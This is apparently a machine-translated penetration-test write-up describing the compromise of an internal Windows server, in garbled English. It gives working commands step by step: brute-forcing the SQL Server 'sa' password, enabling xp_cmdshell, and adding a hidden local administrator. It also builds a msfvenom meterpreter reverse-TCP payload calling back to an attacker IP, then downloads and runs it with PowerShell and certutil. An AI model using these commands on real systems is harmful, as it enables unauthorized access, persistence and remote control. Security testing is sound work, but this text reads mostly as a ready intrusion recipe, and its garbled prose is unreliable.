0x00 Foreword
A recent internal network server at the customer site penetration testing, found a large number of weak passwords, this course is from here ???
0x01 weak passwords
Target ip port scanning, open ports 80,445,1433,3389
- access port 80, but a successful installation interface, scan the directory to see if there is source code disclosure, to no avail
- to use nmap port scan script 445, to see if ms17010 and other vulnerabilities exist, to no avail
- the use of weak passwords tool super 1433 blast, blasting successful, account password: SA / SA
- simultaneous blasting of 3389, to no avail
thus determine the breakthrough, using navicat successful connection sql server database
0x02 connector 3389
Turned a bit, no data, the server attempts to take it, therefore direct the New Query, open xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
Then execute the command
exec master..xp_cmdshell "whoami";
It is system permissions, and imagined as
3389 is open, it is better to add a user to directly connect a remote desktop bar
Strengthening the password strength, re-add
exec master..xp_cmdshell "net user test paperpen123. /add"; exec master..xp_cmdshell "net localgroup administrators test /add";
Everything is going smoothly, start to connect 3389, but unfortunately
It is win7, allowing only a single user login, if his words were found to squeeze can not continue to play, or give up the right connection 3389
0x03 powershell download Trojan
I still come to the local bomb shell, easy to operate, but said simply, how to bomb it?
It should be emphasized that, where the network can not access the Internet, you can not use commands from the external network download tool
it can do, let him from my local server to download tool on his server on it
but to turn off the firewall machine , after the failure of the implementation of access only to think of it. My ip is 195.1.7.23
use kali generate exe Trojan
msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe
Local phpstudy quickly build environment
under the shell.exe into the root of the site, links to http://195.1.7.23/shell.exe
listening local port 8888
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 195.1.7.23 LHOST => 195.1.7.23 msf5 exploit(multi/handler) > set LPORT 8888 LPORT => 8888 msf5 exploit(multi/handler) > exploit
Everything is ready, he sent a file server performs shell.exe. The next command, most of my friends Calendula provided, thanks about
has been tested, powershell command is executed, so execution of the download command to a friend Calendula
exec master..xp_cmdshell "powershell $client = new-object System.Net.WebClient"; exec master..xp_cmdshell "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')";
These two could merge together to perform, but the previous attempt to find the time to perform other command length limit
So split execution, but unfortunately
DownloadFile be unavailable because of what did not understand, and therefore abandoned this method
0x04 Download certificate
Calendula friend gave me offer a new idea, using certutil.exe, suddenly shocked, unheard of, command is as follows:
exec master..xp_cmdshell 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"';
Use dir to view, download to find success on the server
0x05 rally success
A step backward, and enter the following command and nervously clicked execution
exec master..xp_cmdshell 'shell.exe';
Stuck ..., and execute again, and stuck ..., and perform again, what ???
back monitor screen, press ctrl + c re going to monitor the results into meterpreter interface, it turned out to be stuck ???
Excitedly cut a Photo
Look for a moment is not a domain environment
Yes yes, it seems there is still a long way to go. .
0x06 Conclusion
The write this now, if progress will be updated. Welcome you to discuss chefs message, communicate with each other, learn from each other and progress together.